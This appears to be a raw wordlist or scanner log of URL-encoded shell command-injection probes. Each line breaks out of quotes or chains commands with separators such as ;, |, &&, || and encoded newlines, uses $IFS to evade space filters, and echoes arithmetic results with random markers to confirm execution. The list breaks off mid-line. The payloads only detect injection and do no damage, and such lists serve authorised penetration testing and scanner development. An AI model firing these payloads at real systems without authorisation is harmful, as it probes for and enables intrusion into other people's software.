$IFSYHECUO)YHECUO\\\n%27||echo$IFSRIFFSO$((66%2B74))$(echo$IFSRIFFSO)RIFFSO\\\n%27&&echo$IFSKITBIZ$((2%2B45))$(echo$IFSKITBIZ)KITBIZ\\\n%27%0aecho$IFSMNPQOV$((53%2B67))$(echo$IFSMNPQOV)MNPQOV\\\n%27%3Becho$IFSBXCHUC$((98%2B22))$(echo$IFSBXCHUC)BXCHUC\\\n%27%26echo$IFSHBDZXC$((96%2B3))$(echo$IFSHBDZXC)HBDZXC\\\n%27%26%26echo$IFSBVHNWZ$((43%2B2))$(echo$IFSBVHNWZ)BVHNWZ\\\n%27%7Cecho$IFSFCLIWQ$((68%2B57))$(echo$IFSFCLIWQ)FCLIWQ\\\n%27%7C%7Cecho$IFSCKVBFP$((70%2B7))$(echo$IFSCKVBFP)CKVBFP\\\n%27echo$IFSENOPZR$((31%2B41))$(echo$IFSENOPZR)ENOPZR&\n%27%20echo%20ENKTWS$((18%2B26))$(echo%20ENKTWS)ENKTWS&\n%27;echo$IFSXFMQSA$((31%2B54))$(echo$IFSXFMQSA)XFMQSA&\n%27&echo$IFSEJMOPP$((83%2B86))$(echo$IFSEJMOPP)EJMOPP&\n%27|echo$IFSMCIDIP$((54%2B31))$(echo$IFSMCIDIP)MCIDIP&\n%27||echo$IFSVGJPPI$((78%2B43))$(echo$IFSVGJPPI)VGJPPI&\n%27&&echo$IFSRURCZX$((52%2B67))$(echo$IFSRURCZX)RURCZX&\n%27%0aecho$IFSNUAPKN$((22%2B15))$(echo$IFSNUAPKN)NUAPKN&\n%27%3Becho$IFSRZLSCU$((35%2B98))$(echo$IFSRZLSCU)RZLSCU&\n%27%26echo$IFSPGDDIP$((30%2B43))$(echo$IFSPGDDIP)PGDDIP&\n%27%26%26echo$IFSSFCCJW$((70%2B23))$(echo$IFSSFCCJW)SFCCJW&\n%27%7Cecho$IFSBBTQTF$((39%2B3))$(echo$IFSBBTQTF)BBTQTF&\n%27%7C%7Cecho$IFSAEDQZA$((27%2B88))$(echo$IFSAEDQZA)AEDQZA&\n%27echo$IFSNSNDEQ$((93%2B51))$(echo$IFSNSNDEQ)NSNDEQ|\n%27%20echo%20KLCYYE$((89%2B0))$(echo%20KLCYYE)KLCYYE|\n%27;echo$IFSRNDFJD$((90%2B55))$(echo$IFSRNDFJD)RNDFJD|\n%27&echo$IFSXNSQSX$((90%2B70))$(echo$IFSXNSQSX)XNSQSX|\n%27|echo$IFSNIHTHK$((9%2B70))$(echo$IFSNIHTHK)NIHTHK|\n%27||echo$IFSBLPPXU$((2%2B17))$(echo$IFSBLPPXU)BLPPXU|\n%27&&echo$IFSOOJWHW$((27%2B7))$(echo$IFSOOJWHW)OOJWHW|\n%27%0aecho$IFSONEZGX$((68%2B29))$(echo$IFSONEZGX)ONEZGX|\n%27%3Becho$IFSCJUMYI$((23%2B49))$(echo$IFSCJUMYI)CJUMYI|\n%27%26echo$IFSOZMCUX$((65%2B38))$(echo$IFSOZMCUX)OZMCUX|\n%27%26%26echo$IFSFYRIYE$((49%2B44))$(echo$IFSFYRIYE)FYRIYE|\n%27%7Cecho$IFSNSAIBB$((53%2B67))$(echo$IFSNSAIBB)NSAIBB|\n%27%7C%7Cecho$IFSXNUTZK$((27%2B45))$(echo$IFSXNUTZK)XNUTZK|\n%27echo$IFSOFNFSY$((33%2B29))$(echo$IFSOFNFSY)OFNFSY%27\n%27%20echo%20WBRAYT$((68%2B32))$(echo%20WBRAYT)WBRAYT%27\n%27;echo$IFSHOOXVC$((69%2B30))$(echo$IFSHOOXVC)HOOXVC%27\n%27&echo$IFSBBRTZG$((50%2B1))$(echo$IFSBBRTZG)BBRTZG%27\n%27|echo$IFSPDOCRP$((90%2B89))$(echo$IFSPDOCRP)PDOCRP%27\n%27||echo$IFSMYGHXG$((70%2B58))$(echo$IFSMYGHXG)MYGHXG%27\n%27&&echo$IFSIIHKFG$((7%2B64))$(echo$IFSIIHKFG)IIHKFG%27\n%27%0aecho$IFSYAFSKC$((98%2B11))$(echo$IFSYAFSKC)YAFSKC%27\n%27%3Becho$IFSLZXFCH$((44%2B38))$(echo$IFSLZXFCH)LZXFCH%27\n%27%26echo$IFSAPFBSK$((40%2B51))$(echo$IFSAPFBSK)APFBSK%27\n%27%26%26echo$IFSFTQZAZ$((66%2B79))$(echo$IFSFTQZAZ)FTQZAZ%27\n%27%7Cecho$IFSGQCFSG$((77%2B66))$(echo$IFSGQCFSG)GQCFSG%27\n%27%7C%7Cecho$IFSLNILSC$((52%2B23))$(echo$IFSLNILSC)LNILSC%27\n%27echo$IFSFOVBLV$((51%2B93))$(echo$IFSFOVBLV)FOVBLV%22\n%27%20echo%20KEIMRP$((17%2B26))$(echo%20KEIMRP)KEIMRP%22\n%27;echo$IFSXUIGJZ$((84%2B80))$(echo$IFSXUIGJZ)XUIGJZ%22\n%27&echo$IFSBOCKFB$((70%2B90))$(echo$IFSBOCKFB)BOCKFB%22\n%27|echo$IFSMPTNCZ$((32%2B33))$(echo$IFSMPTNCZ)MPTNCZ%22\n%27||echo$IFSJZSHOM$((90%2B14))$(echo$IFSJZSHOM)JZSHOM%22\n%27&&echo$IFSRQAZYH$((37%2B77))$(echo$IFSRQAZYH)RQAZYH%22\n%27%0aecho$IFSCNBVMZ$((1%2B71))$(echo$IFSCNBVMZ)CNBVMZ%22\n%27%3Becho$IFSMGMRMA$((41%2B1))$(echo$IFSMGMRMA)MGMRMA%22\n%27%26echo$IFSLXYYNO$((16%2B12))$(echo$IFSLXYYNO)LXYYNO%22\n%27%26%26echo$IFSTZEQVF$((83%2B23))$(echo$IFSTZEQVF)TZEQVF%22\n%27%7Cecho$IFSQDDMWF$((38%2B22))$(echo$IFSQDDMWF)QDDMWF%22\n%27%7C%7Cecho$IFSDEQICN$((63%2B9))$(echo$IFSDEQICN)DEQICN%22\n%27echo$IFSYZWJVC$((52%2B73))$(echo$IFSYZWJVC)YZWJVC%5C%5C\n%27%20echo%20CKNGPL$((15%2B58))$(echo%20CKNGPL)CKNGPL%5C%5C\n%27;echo$IFSSHQCUK$((3%2B51))$(echo$IFSSHQCUK)SHQCUK%5C%5C\n%27&echo$IFSRROPXW$((41%2B77))$(echo$IFSRROPXW)RROPXW%5C%5C\n%27|echo$IFSVBZXOU$((17%2B37))$(echo$IFSVBZXOU)VBZXOU%5C%5C\n%27||echo$IFSSWPMAE$((92%2B33))$(echo$IFSSWPMAE)SWPMAE%5C%5C\n%27&&echo$IFSBTAEIF$((13%2B69))$(echo$IFSBTAEIF)BTAEIF%5C%5C\n%27%0aecho$IFSNOGTKT$((72%2B41))$(echo$IFSNOGTKT)NOGTKT%5C%5C\n%27%3Becho$IFSLXLIDX$((76%2B8))$(echo$IFSLXLIDX)LXLIDX%5C%5C\n%27%26echo$IFSUNGUOC$((43%2B21))$(echo$IFSUNGUOC)UNGUOC%5C%5C\n%27%26%26echo$IFSFRTUVD$((22%2B54))$(echo$IFSFRTUVD)FRTUVD%5C%5C\n%27%7Cecho$IFSEVZHLM$((41%2B61))$(echo$IFSEVZHLM)EVZHLM%5C%5C\n%27%7C%7Cecho$IFSJFYJHQ$((96%2B6))$(echo$IFSJFYJHQ)JFYJHQ%5C%5C\n%27echo$IFSRHCRJN$((88%2B78))$(echo$IFSRHCRJN)RHCRJN%2F%2F\n%27%20echo%20CCRTJP$((52%2B3))$(echo%20CCRTJP)CCRTJP%2F%2F\n%27;echo$IFSXUUDGE$((67%2B2))$(echo$IFSXUUDGE)XUUDGE%2F%2F\n%27&echo$IFSTZNBWT$((87%2B69))$(echo$IFSTZNBWT)TZNBWT%2F%2F\n%27|echo$IFSQJCEHO$((0%2B51))$(echo$IFSQJCEHO)QJCEHO%2F%2F\n%27||echo$IFSJIUIDF$((89%2B41))$(echo$IFSJIUIDF)JIUIDF%2F%2F\n%27&&echo$IFSEQCQBA$((18%2B65))$(echo$IFSEQCQBA)EQCQBA%2F%2F\n%27%0aecho$IFSOETQLB$((10%2B18))$(echo$IFSOETQLB)OETQLB%2F%2F\n%27%3Becho$IFSKTDMLA$((82%2B25))$(echo$IFSKTDMLA)KTDMLA%2F%2F\n%27%26echo$IFSDXNLEZ$((56%2B76))$(echo$IFSDXNLEZ)DXNLEZ%2F%2F\n%27%26%26echo$IFSDXQHAS$((90%2B85))$(echo$IFSDXQHAS)DXQHAS%2F%2F\n%27%7Cecho$IFSZXEJNO$((10%2B18))$(echo$IFSZXEJNO)ZXEJNO%2F%2F\n%27%7C%7Cecho$IFSMPGVLE$((9%2B44))$(echo$IFSMPGVLE)MPGVLE%2F%2F\n%27echo$IFSXLGSCN$((77%2B2))$(echo$IFSXLGSCN)XLGSCN%26\n%27%20echo%20DOOTQL$((40%2B84))$(echo%20DOOTQL)DOOTQL%26\n%27;echo$IFSVAUTCF$((31%2B25))$(echo$IFSVAUTCF)VAUTCF%26\n%27&echo$IFSLVUBOX$((6%2B49))$(echo$IFSLVUBOX)LVUBOX%26\n%27|echo$IFSNHYJTJ$((44%2B34))$(echo$IFSNHYJTJ)NHYJTJ%26\n%27||echo$IFSDZJSFZ$((60%2B65))$(echo$IFSDZJSFZ)DZJSFZ%26\n%27&&echo$IFSMSRADT$((94%2B98))$(echo$IFSMSRADT)MSRADT%26\n%27%0aecho$IFSEMNGCD$((37%2B86))$(echo$IFSEMNGCD)EMNGCD%26\n%27%3Becho$IFSCAUOQJ$((92%2B34))$(echo$IFSCAUOQJ)CAUOQJ%26\n%27%26echo$IFSNWJCNK$((78%2B98))$(echo$IFSNWJCNK)NWJCNK%26\n%27%26%26echo$IFSVZAYJB$((24%2B72))$(echo$IFSVZAYJB)VZAYJB%26\n%27%7Cecho$IFSQSZPWD$((73%2B91))$(echo$IFSQSZPWD)QSZPWD%26\n%27%7C%7Cecho$IFSVCFZJU$((65%2B17))$(echo$IFSVCFZJU)VCFZJU%26\n%27echo$IFSBKEPKJ$((50%2B70))$(echo$IFSBKEPKJ)BKEPKJ%7C\n%27%20echo%20UVFTTN$((65%2B44))$(echo%20UVFTTN)UVFTTN%7C\n%27;echo$IFSWZVYQZ$((68%2B9))$(echo$IFSWZVYQZ)WZVYQZ%7C\n%27&echo$IFSHXZBRD$((3%2B30))$(echo$IFSHXZBRD)HXZBRD%7C\n%27|echo$IFSTBYTAT$((44%2B46))$(echo$IFSTBYTAT)TBYTAT%7C\n%27||echo$IFSRQPTDA$((77%2B60))$(echo$IFSRQPTDA)RQPTDA%7C\n%27&&echo$IFSGQWBLL$((20%2B82))$(echo$IFSGQWBLL)GQWBLL%7C\n%27%0aecho$IFSNTGMHS$((16%2B18))$(echo$IFSNTGMHS)NTGMHS%7C\n%27%3Becho$IFSHXPCVJ$((50%2B88))$(echo$IFSHXPCVJ)HXPCVJ%7C\n%27%26echo$IFSKBFTYY$((46%2B12))$(echo$IFSKBFTYY)KBFTYY%7C\n%27%26%26echo$IFSMBEHLC$((29%2B30))$(echo$IFSMBEHLC)MBEHLC%7C\n%27%7Cecho$IFSKCJERS$((61%2B84))$(echo$IFSKCJERS)KCJERS%7C\n%27%7C%7Cecho$IFSUDYXOW$((85%2B10))$(echo$IFSUDYXOW)UDYXOW%7C\n%22echo$IFSNYPPVL$((60%2B65))$(echo$IFSNYPPVL)NYPPVL\n%22%20echo%20TENJSX$((79%2B73))$(echo%20TENJSX)TENJSX\n%22;echo$IFSZRPLSF$((25%2B59))$(echo$IFSZRPLSF)ZRPLSF\n%22&echo$IFSMYMGJG$((67%2B19))$(echo$IFSMYMGJG)MYMGJG\n%22|echo$IFSFHBVSW$((89%2B96))$(echo$IFSFHBVSW)FHBVSW\n%22||echo$IFSXJETQS$((39%2B59))$(echo$IFSXJETQS)XJETQS\n%22&&echo$IFSNPVQVS$((92%2B44))$(echo$IFSNPVQVS)NPVQVS\n%22%0aecho$IFSGUMDYN$((0%2B81))$(echo$IFSGUMDYN)GUMDYN\n%22%3Becho$IFSBXFYAK$((0%2B86))$(echo$IFSBXFYAK)BXFYAK\n%22%26echo$IFSAVKDKB$((96%2B57))$(echo$IFSAVKDKB)AVKDKB\n%22%26%26echo$IFSQIRZPO$((66%2B91))$(echo$IFSQIRZPO)QIRZPO\n%22%7Cecho$IFSDCXXXG$((2%2B46))$(echo$IFSDCXXXG)DCXXXG\n%22%7C%7Cecho$IFSAGYUYQ$((68%2B32))$(echo$IFSAGYUYQ)AGYUYQ\n%22echo$IFSTXEBDL$((98%2B30))$(echo$IFSTXEBDL)TXEBDL'\n%22%20echo%20LSKHTI$((85%2B74))$(echo%20LSKHTI)LSKHTI'\n%22;echo$IFSKDCQSI$((18%2B31))$(echo$IFSKDCQSI)KDCQSI'\n%22&echo$IFSVYULFC$((89%2B15))$(echo$IFSVYULFC)VYULFC'\n%22|echo$IFSYOKEXI$((60%2B52))$(echo$IFSYOKEXI)YOKEXI'\n%22||echo$IFSWIGSBP$((63%2B65))$(echo$IFSWIGSBP)WIGSBP'\n%22&&echo$IFSZFCQFQ$((13%2B98))$(echo$IFSZFCQFQ)ZFCQFQ'\n%22%0aecho$IFSTCCVZI$((1%2B35))$(echo$IFSTCCVZI)TCCVZI'\n%22%3Becho$IFSWDYXMD$((62%2B40))$(echo$IFSWDYXMD)WDYXMD'\n%22%26echo$IFSLOHVXK$((39%2B85))$(echo$IFSLOHVXK)LOHVXK'\n%22%26%26echo$IFSBWWMGD$((16%2B23))$(echo$IFSBWWMGD)BWWMGD'\n%22%7Cecho$IFSKVTRBW$((82%2B81))$(echo$IFSKVTRBW)KVTRBW'\n%22%7C%7Cecho$IFSYZFWPL$((54%2B79))$(echo$IFSYZFWPL)YZFWPL'\n%22echo$IFSGIZFRE$((56%2B79))$(echo$IFSGIZFRE)GIZFRE\"\n%22%20echo%20BWDHGF$((47%2B6))$(echo%20BWDHGF)BWDHGF\"\n%22;echo$IFSVBRGVR$((55%2B92))$(echo$IFSVBRGVR)VBRGVR\"\n%22&echo$IFSKRRDDG$((27%2B70))$(echo$IFSKRRDDG)KRRDDG\"\n%22|echo$IFSCSECOD$((94%2B97))$(echo$IFSCSECOD)CSECOD\"\n%22||echo$IFSQCMNBQ$((8%2B12))$(echo$IFSQCMNBQ)QCMNBQ\"\n%22&&echo$IFSKHRFCH$((77%2B13))$(echo$IFSKHRFCH)KHRFCH\"\n%22%0aecho$IFSVFVGSF$((75%2B11))$(echo$IFSVFVGSF)VFVGSF\"\n%22%3Becho$IFSFILOPR$((54%2B95))$(echo$IFSFILOPR)FILOPR\"\n%22%26echo$IFSRHEKFG$((34%2B24))$(echo$IFSRHEKFG)RHEKFG\"\n%22%26%26echo$IFSQAQXNJ$((73%2B59))$(echo$IFSQAQXNJ)QAQXNJ\"\n%22%7Cecho$IFSEKCYEJ$((30%2B67))$(echo$IFSEKCYEJ)EKCYEJ\"\n%22%7C%7Cecho$IFSPBFHAG$((38%2B37))$(echo$IFSPBFHAG)PBFHAG\"\n%22echo$IFSXFAZVQ$((31%2B75))$(echo$IFSXFAZVQ)XFAZVQ\n%22%20echo%20YKSYRU$((78%2B80))$(echo%20YKSYRU)YKSYRU\n%22;echo$IFSPOSWYF$((84%2B58))$(echo$IFSPOSWYF)POSWYF\n%22&echo$IFSUTHIQI$((14%2B78))$(echo$IFSUTHIQI)UTHIQI\n%22|echo$IFSKEDUES$((72%2B2))$(echo$IFSKEDUES)KEDUES\n%22||echo$IFSXQFITQ$((91%2B69))$(echo$IFSXQFITQ)XQFITQ\n%22&&echo$IFSUZURTK$((89%2B35))$(echo$IFSUZURTK)UZURTK\n%22%0aecho$IFSSROBII$((44%2B41))$(echo$IFSSROBII)SROBII\n%22%3Becho$IFSUGGAXQ$((15%2B25))$(echo$IFSUGGAXQ)UGGAXQ\n%22%26echo$IFSPXWAWG$((93%2B23))$(echo$IFSPXWAWG)PXWAWG\n%22%26%26echo$IFSHIGDVX$((46%2B84))$(echo$IFSHIGDVX)HIGDVX\n%22%7Cecho$IFSHASPPT$((51%2B64))$(echo$IFSHASPPT)HASPPT\n%22%7C%7Cecho$IFSBKQQRP$((31%2B59))$(echo$IFSBKQQRP)BKQQRP\n%22echo$IFSWDFJWS$((72%2B66))$(echo$IFSWDFJWS)WDFJWS//\n%22%20echo%20EJENVL$((99%2B67))$(echo%20EJENVL)EJENVL//\n%22;echo$IFSOYDJLD$((49%2B19))$(echo$IFSOYDJLD)OYDJLD//\n%22&echo$IFSETXJTM$((83%2B22))$(echo$IFSETXJTM)ETXJTM//\n%22|echo$IFSPRGTJG$((24%2B21))$(echo$IFSPRGTJG)PRGTJG//\n%22||echo$IFSBZQTDK$((6%2B37))$(echo$IFSBZQTDK)BZQTDK//\n%22&&echo$IFSCHCIGA$((57%2B69))$(echo$IFSCHCIGA)CHCIGA//\n%22%0aecho$IFSWNJDID$((57%2B88))$(echo$IFSWNJDID)WNJDID//\n%22%3Becho$IFSQXLDBX$((32%2B84))$(echo$IFSQXLDBX)QXLDBX//\n%22%26echo$IFSVNUDZG$((59%2B14))$(echo$IFSVNUDZG)VNUDZG//\n%22%26%26echo$IFSWJRXOQ$((50%2B45))$(echo$IFSWJRXOQ)WJRXOQ//\n%22%7Cecho$IFSHVKNCE$((69%2B89))$(echo$IFSHVKNCE)HVKNCE//\n%22%7C%7Cecho$IFSZCCTFB$((82%2B55))$(echo$IFSZCCTFB)ZCCTFB//\n%22echo$IFSWYLAHG$((98%2B68))$(echo$IFSWYLAHG)WYLAHG\\\n%22%20echo%20VXREMW$((56%2B44))$(echo%20VXREMW)VXREMW\\\n%22;echo$IFSFJALAO$((19%2B27))$(echo$IFSFJALAO)FJALAO\\\n%22&echo$IFSZRBHJA$((51%2B20))$(echo$IFSZRBHJA)ZRBHJA\\\n%22|echo$IFSMNAWIZ$((59%2B73))$(echo$IFSMNAWIZ)MNAWIZ\\\n%22||echo$IFSLTPOTF$((71%2B76))$(echo$IFSLTPOTF)LTPOTF\\\n%22&&echo$IFSQUQQGM$((39%2B7))$(echo$IFSQUQQGM)QUQQGM\\\n%22%0aecho$IFSLGKPQJ$((93%2B84))$(echo$IFSLGKPQJ)LGKPQJ\\\n%22%3Becho$IFSHGTRCU$((62%2B99))$(echo$IFSHGTRCU)HGTRCU\\\n%22%26echo$IFSITFACB$((45%2B74))$(echo$IFSITFACB)ITFACB\\\n%22%26%26echo$IFSEFRNKR$((8%2B15))$(echo$IFSEFRNKR)EFRNKR\\\n%22%7Cecho$IFSTDGCCD$((4%2B88))$(echo$IFSTDGCCD)TDGCCD\\\n%22%7C%7Cecho$IFSBVGJOE$((17%2B25))$(echo$IFSBVGJOE)BVGJOE\\\n%22echo$IFSKGAXGA$((7%2B86))$(echo$IFSKGAXGA)KGAXGA&\n%22%20echo%20KEMGCU$((7%2B98))$(echo%20KEMGCU)KEMGCU&\n%22;echo$IFSHZZDKE$((23%2B65))$(echo$IFSHZZDKE)HZZDKE&\n%22&echo$IFSMDGOWJ$((0%2B29))$(echo$IFSMDGOWJ)MDGOWJ&\n%22|echo$IFSXYSMQM$((74%2B33))$(echo$IFSXYSMQM)XYSMQM&\n%22||echo$IFSKOKMSK$((17%2B27))$(echo$IFSKOKMSK)KOKMSK&\n%22&&echo$IFSIFCQGE$((84%2B65))$(echo$IFSIFCQGE)IFCQGE&\n%22%0aecho$IFSFNPDLF$((30%2B38))$(echo$IFSFNPDLF)FNPDLF&\n%22%3Becho$IFSSHWRSB$((43%2B89))$(echo$IFSSHWRSB)SHWRSB&\n%22%26echo$IFSPAQLDV$((40%2B74))$(echo$IFSPAQLDV)PAQLDV&\n%22%26%26echo$IFSTNKVRD$((74%2B48))$(echo$IFSTNKVRD)TNKVRD&\n%22%7Cecho$IFSNNKINL$((7%2B56))$(echo$IFSNNKINL)NNKINL&\n%22%7C%7Cecho$IFSACDZIF$((7%2B56))$(echo$IFSACDZIF)ACDZIF&\n%22echo$IFSNSPJAR$((7%2B90))$(echo$IFSNSPJAR)NSPJAR|\n%22%20echo%20KBNUFV$((78%2B52))$(echo%20KBNUFV)KBNUFV|\n%22;echo$IFSRBNXNK$((31%2B22))$(echo$IFSRBNXNK)RBNXNK|\n%22&echo$IFSTZXMJD$((12%2B74))$(echo$IFSTZXMJD)TZXMJD|\n%22|echo$IFSIQYKZJ$((13%2B97))$(echo$IFSIQYKZJ)IQYKZJ|\n%22||echo$IFSTGMYGU$((64%2B59))$(echo$IFSTGMYGU)TGMYGU|\n%22&&echo$IFSUTEHBK$((73%2B4))$(echo$IFSUTEHBK)UTEHBK|\n%22%0aecho$IFSNPYCHN$((67%2B35))$(echo$IFSNPYCHN)NPYCHN|\n%22%3Becho$IFSLWFTCJ$((19%2B88))$(echo$IFSLWFTCJ)LWFTCJ|\n%22%26echo$IFSVHAUOY$((79%2B26))$(echo$IFSVHAUOY)VHAUOY|\n%22%26%26echo$IFSTNMDEE$((29%2B83))$(echo$IFSTNMDEE)TNMDEE|\n%22%7Cecho$IFSEICSZJ$((51%2B32))$(echo$IFSEICSZJ)EICSZJ|\n%22%7C%7Cecho$IFSBAKJOM$((61%2B8))$(echo$IFSBAKJOM)BAKJOM|\n%22echo$IFSJUCOSG$((27%2B40))$(echo$IFSJUCOSG)JUCOSG%27\n%22%20echo%20HLEPQM$((13%2B16))$(echo%20HLEPQM)HLEPQM%27\n%22;echo$IFSIEYMTU$((1%2B88))$(echo$IFSIEYMTU)IEYMTU%27\n%22&echo$IFSHQDBCP$((68%2B4))$(echo$IFSHQDBCP)HQDBCP%27\n%22|echo$IFSQWZGUZ$((67%2B7))$(echo$IFSQWZGUZ)QWZGUZ%27\n%22||echo$IFSDTOBHC$((30%2B47))$(echo$IFSDTOBHC)DTOBHC%27\n%22&&echo$IFSKGECJW$((94%2B78))$(echo$IFSKGECJW)KGECJW%27\n%22%0aecho$IFSUTHJSW$((11%2B12))$(echo$IFSUTHJSW)UTHJSW%27\n%22%3Becho$IFSTCLHEV$((0%2B38))$(echo$IFSTCLHEV)TCLHEV%27\n%22%26echo$IFSNPBSWH$((19%2B90))$(echo$IFSNPBSWH)NPBSWH%27\n%22%26%26echo$IFSBMSDKL$((25%2B99))$(echo$IFSBMSDKL)BMSDKL%27\n%22%7Cecho$IFSUSGSMP$((39%2B12))$(echo$IFSUSGSMP)USGSMP%27\n%22%7C%7Cecho$IFSZJBERF$((35%2B91))$(echo$IFSZJBERF)ZJBERF%27\n%22echo$IFSJBTZFF$((9%2B76))$(echo$IFSJBTZFF)JBTZFF%22\n%22%20echo%20ZELXMV$((25%2B23))$(echo%20ZELXMV)ZELXMV%22\n%22;echo$IFSCOXAAL$((47%2B23))$(echo$IFSCOXAAL)COXAAL%22\n%22&echo$IFSWFDEUL$((80%2B90))$(echo$IFSWFDEUL)WFDEUL%22\n%22|echo$IFSEYJFJS$((66%2B81))$(echo$IFSEYJFJS)EYJFJS%22\n%22||echo$IFSUMCJZQ$((83%2B7))$(echo$IFSUMCJZQ)UMCJZQ%22\n%22&&echo$IFSTCFOHQ$((83%2B93))$(echo$IFSTCFOHQ)TCFOHQ%22\n%22%0aecho$IFSWVTSGH$((63%2B36))$(echo$IFSWVTSGH)WVTSGH%22\n%22%3Becho$IFSLKBKVH$((78%2B91))$(echo$IFSLKBKVH)LKBKVH%22\n%22%26echo$IFSIETGIV$((33%2B31))$(echo$IFSIETGIV)IETGIV%22\n%22%26%26echo$IFSUDIYDY$((28%2B5))$(echo$IFSUDIYDY)UDIYDY%22\n%22%7Cecho$IFSVOMUAL$((49%2B92))$(echo$IFSVOMUAL)VOMUAL%22\n%22%7C%7Cecho$IFSXHMLVN$((71%2B63))$(echo$IFSXHMLVN)XHMLVN%22\n%22echo$IFSEBQHZC$((54%2B58))$(echo$IFSEBQHZC)EBQHZC%5C%5C\n%22%20echo%20DXYHWC$((70%2B59))$(echo%20DXYHWC)DXYHWC%5C%5C\n%22;echo$IFSBKQZPW$((40%2B60))$(echo$IFSBKQZPW)BKQZPW%5C%5C\n%22&echo$IFSBYMLDE$((27%2B63))$(echo$IFSBYMLDE)BYMLDE%5C%5C\n%22|echo$IFSHWGVIM$((90%2B18))$(echo$IFSHWGVIM)HWGVIM%5C%5C\n%22||echo$IFSANXKRH$((27%2B96))$(echo$IFSANXKRH)ANXKRH%5C%5C\n%22&&echo$IFSZDMIIV$((60%2B55))$(echo$IFSZDMIIV)ZDMIIV%5C%5C\n%22%0aecho$IFSECUVPP$((94%2B69))$(echo$IFSECUVPP)ECUVPP%5C%5C\n%22%3Becho$IFSXMIXIV$((74%2B96))$(echo$IFSXMIXIV)XMIXIV%5C%5C\n%22%26echo$IFSEVHWEV$((99%2B12))$(echo$IFSEVHWEV)EVHWEV%5C%5C\n%22%26%26echo$IFSKPOBYP$((90%2B6))$(echo$IFSKPOBYP)KPOBYP%5C%5C\n%22%7Cecho$IFSOQPWKQ$((62%2B90))$(echo$IFSOQPWKQ)OQPWKQ%5C%5C\n%22%7C%7Cecho$IFSFUISVY$((37%2B75))$(echo$IFSFUISVY)FUISVY%5C%5C\n%22echo$IFSPXHSMC$((2%2B51))$(echo$IFSPXHSMC)PXHSMC%2F%2F\n%22%20echo%20CCPWJP$((28%2B45))$(echo%20CCPWJP)CCPWJP%2F%2F\n%22;echo$IFSPNIBTX$((67%2B98))$(echo$IFSPNIBTX)PNIBTX%2F%2F\n%22&echo$IFSQOVIJM$((98%2B90))$(echo$IFSQOVIJM)QOVIJM%2F%2F\n%22|echo$IFSNEANFV$((47%2B58))$(echo$IFSNEANFV)NEANFV%2F%2F\n%22||echo$IFSKQELND$((18%2B15))$(echo$IFSKQELND)KQELND%2F%2F\n%22&&echo$IFSALIQNR$((1%2B51))$(echo$IFSALIQNR)ALIQNR%2F%2F\n%22%0aecho$IFSVMXLXF$((85%2B89))$(echo$IFSVMXLXF)VMXLXF%2F%2F\n%22%3Becho$IFSEJXJHO$((22%2B15))$(echo$IFSEJXJHO)EJXJHO%2F%2F\n%22%26echo$IFSQJRCGM$((21%2B21))$(echo$IFSQJRCGM)QJRCGM%2F%2F\n%22%26%26echo$IFSQZIYEJ$((0%2B21))$(echo$IFSQZIYEJ)QZIYEJ%2F%2F\n%22%7Cecho$IFSDRZFAI$((10%2B79))$(echo$IFSDRZFAI)DRZFAI%2F%2F\n%22%7C%7Cecho$IFSXPSNLK$((16%2B69))$(echo$IFSXPSNLK)XPSNLK%2F%2F\n%22echo$IFSYOHOJL$((56%2B39))$(echo$IFSYOHOJL)YOHOJL%26\n%22%20echo%20XXGYFR$((27%2B40))$(echo%20XXGYFR)XXGYFR%26\n%22;echo$IFSHREURS$((4%2B58))$(echo$IFSHREURS)HREURS%26\n%22&echo$IFSWGOXEF$((82%2B13))$(echo$IFSWGOXEF)WGOXEF%26\n%22|echo$IFSVUODLE$((87%2B48))$(echo$IFSVUODLE)VUODLE%26\n%22||echo$IFSQAACSL$((16%2B49))$(echo$IFSQAACSL)QAACSL%26\n%22&&echo$IFSEBZXUY$((79%2B44))$(echo$IFSEBZXUY)EBZXUY%26\n%22%0aecho$IFSGKNCHV$((13%2B8))$(echo$IFSGKNCHV)GKNCHV%26\n%22%3Becho$IFSBYDVLH$((40%2B59))$(echo$IFSBYDVLH)BYDVLH%26\n%22%26echo$IFSUGHPED$((99%2B93))$(echo$IFSUGHPED)UGHPED%26\n%22%26%26echo$IFSJIGDYZ$((64%2B13))$(echo$IFSJIGDYZ)JIGDYZ%26\n%22%7Cecho$IFSWRMIXV$((36%2B74))$(echo$IFSWRMIXV)WRMIXV%26\n%22%7C%7Cecho$IFSGSYMFU$((44%2B78))$(echo$IFSGSYMFU)GSYMFU%26\n%22echo$IFSXVVJRH$((4%2B71))$(echo$IFSXVVJRH)XVVJRH%7C\n%22%20echo%20LWNPLT$((96%2B42))$(echo%20LWNPLT)LWNPLT%7C\n%22;echo$IFSUOJTRY$((93%2B10))$(echo$IFSUOJTRY)UOJTRY%7C\n%22&echo$IFSGVEIAO$((60%2B74))$(echo$IFSGVEIAO)GVEIAO%7C\n%22|echo$IFSIJEOUD$((95%2B12))$(echo$IFSIJEOUD)IJEOUD%7C\n%22||echo$IFSOJFYUI$((71%2B37))$(echo$IFSOJFYUI)OJFYUI%7C\n%22&&echo$IFSCYRNGO$((16%2B47))$(echo$IFSCYRNGO)CYRNGO%7C\n%22%0aecho$IFSURWJYQ$((9%2B54))$(echo$IFSURWJYQ)URWJYQ%7C\n%22%3Becho$IFSRPJGSG$((43%2B49))$(echo$IFSRPJGSG)RPJGSG%7C\n%22%26echo$IFSLJECUX$((80%2B24))$(echo$IFSLJECUX)LJECUX%7C\n%22%26%26echo$IFSBQHTLW$((57%2B18))$(echo$IFSBQHTLW)BQHTLW%7C\n%22%7Cecho$IFSXVXORA$((57%2B55))$(echo$IFSXVXORA)XVXORA%7C\n%22%7C%7Cecho$IFSBNKMZL$((51%2B20))$(echo$IFSBNKMZL)BNKMZL%7C\n%7Cecho$IFSOKJGAG$((39%2B76))$(echo$IFSOKJGAG)OKJGAG\n%7C%20echo%20HCOMBJ$((69%2B6))$(echo%20HCOMBJ)HCOMBJ\n;echo$IFSXAJUQV$((80%2B48))$(echo$IFSXAJUQV)XAJUQV\n&echo$IFSOHDHIG$((24%2B5))$(echo$IFSOHDHIG)OHDHIG\n|echo$IFSYHJJYR$((16%2B67))$(echo$IFSYHJJYR)YHJJYR\n||echo$IFSCGCLSD$((78%2B73))$(echo$IFSCGCLSD)CGCLSD\n&&echo$IFSKJOVJF$((86%2B99))$(echo$IFSKJOVJF)KJOVJF\n%0aecho$IFSOGNJPF$((26%2B51))$(echo$IFSOGNJPF)OGNJPF\n%3Becho$IFSKZGJJF$((9%2B27))$(echo$IFSKZGJJF)KZGJJF\n%26echo$IFSDEDUEE$((30%2B57))$(echo$IFSDEDUEE)DEDUEE\n%26%26echo$IF